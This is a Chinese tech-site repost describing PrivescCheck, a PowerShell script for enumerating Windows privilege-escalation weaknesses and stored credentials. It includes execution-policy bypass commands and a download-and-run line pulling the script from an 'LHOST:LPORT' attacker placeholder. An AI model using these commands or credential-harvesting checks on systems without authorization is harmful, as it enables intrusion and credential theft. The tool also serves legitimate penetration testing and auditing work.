内容简介:PrivescCheck是一款针对Windows系统的提权枚举脚本,该脚本能够枚举出目标Windows系统中常见的Windows错误安全配置,而这些错误的安全配置将允许攻击者在目标系统中实现信息收集以及权限提升,这些对于攻击者的漏洞利用以及后渗透攻击来说将非常有用。该工具基于目前,该项目仍处于开发阶段,因为我们还打算向其中添加更多的检测机制,不过该项目现已接近完工。
PrivescCheck
PrivescCheck是一款针对Windows系统的提权枚举脚本,该脚本能够枚举出目标Windows系统中常见的Windows错误安全配置,而这些错误的安全配置将允许攻击者在目标系统中实现信息收集以及权限提升,这些对于攻击者的漏洞利用以及后渗透攻击来说将非常有用。
该 工具 基于 PowerUp 这款工具实现,并且添加了更多的检测机制,以降低工具的误报率。
目前,该项目仍处于开发阶段,因为我们还打算向其中添加更多的检测机制,不过该项目现已接近完工。
其实我本人非常喜欢PowerUp,因为它可以快速枚举出目标设备中的常见漏洞,而且无需借助第三方工具实现。但问题就在于,该工具已经多年未更新了,而且该工具有的时候返回的结果并不准确,存在一定的误报。
因此,在PrivescCheck脚本中我们考虑了以下几个方面:
1、不使用类似accesschk.exe之类的第三方工具; 2、不使用类似whoami.exe或netstat.exe之类的Windows内置命令; 3、不使用类似sc.exe或tasklist.exe之类的Windows内置工具; 4、不使用WMI; 5、必须兼容PowerShell v2;
工具下载
广大研究人员可以使用下列命令将项目源码克隆至本地:
git clone https://github.com/itm4n/PrivescCheck.git
工具使用
我们可以直接在一个PowerShell命令行控制台中运行该脚本:
PS C:\Temp\> Set-ExecutionPolicy Bypass -Scope Process -Force PS C:\Temp\> . .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck
该工具在显示输出数据的同时,会将它们写入到一个日志文件中:
PS C:\Temp\> . .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck | Tee-Object "C:\Temp\result.txt"
除此之外,我们也可以打开CMD命令行工具来使用该脚本:
C:\Temp\>powershell -ep bypass -c ". .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck"
当然了,你也可以从一台远程Web服务器来导入并使用该脚本:
C:\Temp\>powershell "IEX (New-Object Net.WebClient).DownloadString('http://LHOST:LPORT/Invoke-PrivescCheck.ps1'); Invoke-PrivescCheck"
功能介绍
获取当前用户信息
Invoke-UserCheck – 获取当前用户的用户名和SID Invoke-UserGroupsCheck – 枚举当前用户所属的组(默认组和低特权组除外) Invoke-UserPrivilegesCheck – 枚举潜在高权限用户的令牌
获取目标设备服务
Invoke-InstalledServicesCheck – 枚举非默认服务 Invoke-ServicesPermissionsCheck – 枚举当前用户可以通过服务控制管理器修改的服务 Invoke-ServicesPermissionsRegistryCheck – 枚举当前用户可在注册表中修改的服务 Invoke-ServicesImagePermissionsCheck – E枚举具有可修改二进制文件(或参数)的所有服务 Invoke-ServicesUnquotedPathCheck – 枚举具有可利用的未引用路径的服务
DLL劫持
Invoke-DllHijackingCheck - 检查是否有任何系统路径文件夹可修改
程序/进程获取
Invoke-InstalledProgramsCheck – 枚举默认情况下未安装的应用程序 Invoke-ModifiableProgramsCheck – 枚举拥有DLL文件的可修改EXE的应用程序 Invoke-RunningProcessCheck – 枚举正在运行的进程
获取凭据
Invoke-SamBackupFilesCheck – 检查SAM/SYSTEM备份文件的常用位置 Invoke-UnattendFilesCheck -枚举无人使用的文件并提取凭证 Invoke-WinlogonCheck – 检查存储在Winlogon注册表项中的凭据 Invoke-CredentialFilesCheck – 枚举存储在当前用户AppData文件夹中的凭据文件 Invoke-VaultCredCheck – 枚举保存在凭据管理器中的凭据 Invoke-VaultListCheck – 枚举保存在凭据管理器中的web凭据 Invoke-GPPPasswordCheck – 枚举包含非空“cpassword”字段的组策略首选项(GPP)
获取注册表信息
Invoke-UacCheck – 检查是否启用了UAC(用户访问控制) Invoke-LapsCheck – 检查是否启用了LAPS(本地管理密码解决方案) Invoke-PowershellTranscriptionCheck – 检查是否配置/启用了PowerShell转录 Invoke-RegistryAlwaysInstallElevatedCheck – 检查注册表中是否设置了AlwaysInstallElevated项 Invoke-LsaProtectionsCheck – 检查LSASS是否作为受保护进程运行(附加检查)
获取网络信息
Invoke-TcpEndpointsCheck – 枚举本地计算机(IPv4和IPv6)上的异常TCP节点 Invoke-UdpEndpointsCheck – 枚举本地计算机(IPv4和IPv6)上的异常UDP节点
其他杂项
Invoke-WindowsUpdateCheck – 检查目标设备的上次更新时间 Invoke-SystemInfoCheck – 获取目标设备操作系统的名称和完整的版本字符串 Invoke-LocalAdminGroupCheck – 枚举默认本地管理组的成员 Invoke-MachineRoleCheck – 获取目标设备的角色(工作站、服务器、域控制器) Invoke-SystemStartupHistoryCheck – 获取目标设备系统启动事件的列表 Invoke-SystemStartupCheck – 获取目标系统的上次启动时间 Invoke-SystemDrivesCheck – 获取当前映射的本地驱动器和网络共享的列表
项目地址
PrivescCheck:【 GitHub传送门 】
* 参考来源: itm4n ,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:- c# – 枚举时项目发生变化时是否会影响枚举?
- 测者的测试技术手册:Junit单元测试遇见的一个枚举类型的坑(枚举类型详解)
- 测者的JUnit单元测试探坑记:Junit单元测试遇见的一个枚举类型的坑(枚举类型详解)
- c# – 循环枚举类型
- Python 的枚举类型
- 枚举的使用示例
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
《Hello Ruby:儿童编程大冒险》(平装)
(芬兰)琳达·刘卡斯 / 窝牛妈 / 浙江人民美术出版社 / 2018
快来认识Ruby——一个想象力丰富,喜欢解决难题的女生。Ruby认识了一群新朋友:聪明的雪豹、友好的狐狸、忙碌的机器人等等。这本书以讲故事的方式向孩子们介绍了基础的计算思维,比如拆分问题,制定分步计划,寻找规律,打破思维定势等等;之后,通过一系列鼓励探索和创造的练习和活动,孩子们对这些关乎编程核心问题的基本概念有了进一步的理解。一起来看看 《《Hello Ruby:儿童编程大冒险》(平装)》 这本书的介绍吧!